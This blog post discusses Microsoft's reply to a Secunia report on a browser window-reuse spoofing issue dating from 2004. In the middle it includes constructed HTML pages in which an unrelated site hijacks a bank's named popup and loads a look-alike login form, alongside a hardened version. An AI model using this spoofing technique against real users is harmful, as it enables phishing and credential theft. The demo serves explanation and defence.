Microsoft has responded to the latest vulnerability report from Secunia, which we covered here yesterday, in a post at the Microsoft Security Response Center Blog titled Information on New Address Bar Issue. According to Microsoft, this is a known consequence of how browsers are designed: a page on one site is allowed to load content into a browser window that another site opened, as long as it knows that window's name (the value used in a link's target attribute), which is what lets browsers reuse windows instead of opening a new one each time. You've all seen it: you click a link and it opens in another window; you go back and click another link, or go to another page and click a link, and it opens in that same window unless you've closed it. The problem is that the "other page" can belong to a site the user never chose to trust, while the window still looks like the one the trusted site opened.
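To make the window-reuse behaviour concrete, here is an added example that is not code from the post, from Secunia or from Microsoft: two constructed pages, a hypothetical bank page that opens a named login popup with the address bar hidden, and an attacker page on a different site whose link targets the same window name. The file names, the site names and the window name `bank_login` are assumptions made for the demo.

```html
<!-- bank.html: the site the user trusts (hypothetical). It opens its login
     popup with the location bar hidden, the common 2004-era pattern that made
     the spoof convincing, because nothing on screen shows where the page is. -->
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Example Bank (constructed demo page)</title></head>
<body>
  <h1>Example Bank</h1>
  <!-- The popup gets a fixed, guessable window name, "bank_login". That name is
       the only thing another site needs to take the window over. -->
  <a href="login.html" target="bank_login"
     onclick="window.open(this.href, this.target,
              'width=480,height=360,location=no,toolbar=no,menubar=no'); return false;">
    Sign in (opens popup)
  </a>
</body>
</html>

<!-- login.html: the real login form shown inside the popup. Its content does not
     matter for the demo; any page the bank serves will do. -->

<!-- attacker.html: served from an unrelated site and visited in another window
     while the bank popup is still open. No script is needed: a plain link whose
     target names the bank's popup is enough. -->
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Free screensavers (constructed demo page)</title></head>
<body>
  <!-- On a browser that resolves target names across all open windows, this link
       navigates the existing "bank_login" popup to the attacker's look-alike
       login form (fake-login.html, hypothetical). The popup still has no address
       bar, so the only visible change is the content itself. -->
  <a href="fake-login.html" target="bank_login">Download</a>
</body>
</html>

<!-- bank-hardened.html: what the trusted site can do on its side. No reusable
     window name (target="_blank" never matches an existing window), and the
     popup keeps its address bar so the user can actually check the URL and the
     SSL indicator. rel="noopener" is a later addition that also cuts the
     opener relationship between the two windows. -->
<a href="login.html" target="_blank" rel="noopener">Sign in (hardened)</a>
```

Calling `window.open('fake-login.html', 'bank_login')` from script on the attacker page does the same thing as the link: with an existing window of that name, the browser reuses it rather than creating one. One caveat for anyone trying this today: the fix browsers adopted after the 2004 reports is to let a page target a named window only when the two are related (same origin, or connected through the frame or opener chain), so an unrelated tab gets a fresh window instead and the demo does not reproduce as written on a current browser. It documents the behaviour the post is discussing, not a live issue.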
Like we always do, we investigated that claim thoroughly in 2004. We found that in all cases, for this to represent a threat for phishing or spoofing attacks, a user would have to decide to trust the authenticity of the page without verifying the page's address (because there was no address bar) and without verifying an SSL connection (like we recommend on our website). In other words, the scenario requires that you intentionally not use the security features specifically put in place to help protect against phishing and spoofing attacks. Because of that, we said in 2004 that this issue doesn't represent a security vulnerability as we have defined it on our website. Source: Microsoft Security Response Center Blog
Microsoft even said in their post that they looked at how they could make this better for users. Since the whole trick depends on the user not seeing (or ignoring) the address bar when the page in a window changes, they would show the address bar even in popup windows, so you can always see the actual URL of whatever is loaded there. The lesson is that you can't assume a window belongs to the site that opened it: check the address bar and the SSL indicator before typing anything sensitive, because the content of a window is not proof of where it came from.
Now, yesterday, when I posted it, I admit I did not read the whole posting, so I did not realize that it was an old "vulnerability". I assumed, as many did, I'm sure, that it was a new issue. So I helped spread a little bit of this nonsense, but Secunia should bear most of the responsibility. In their quest to report vulnerabilities, they made it look like it was a new one, at least in my eyes. I will be more observant in the future when looking at their reports. Thanks to Spyware Sucks for letting me know I did not report the whole story.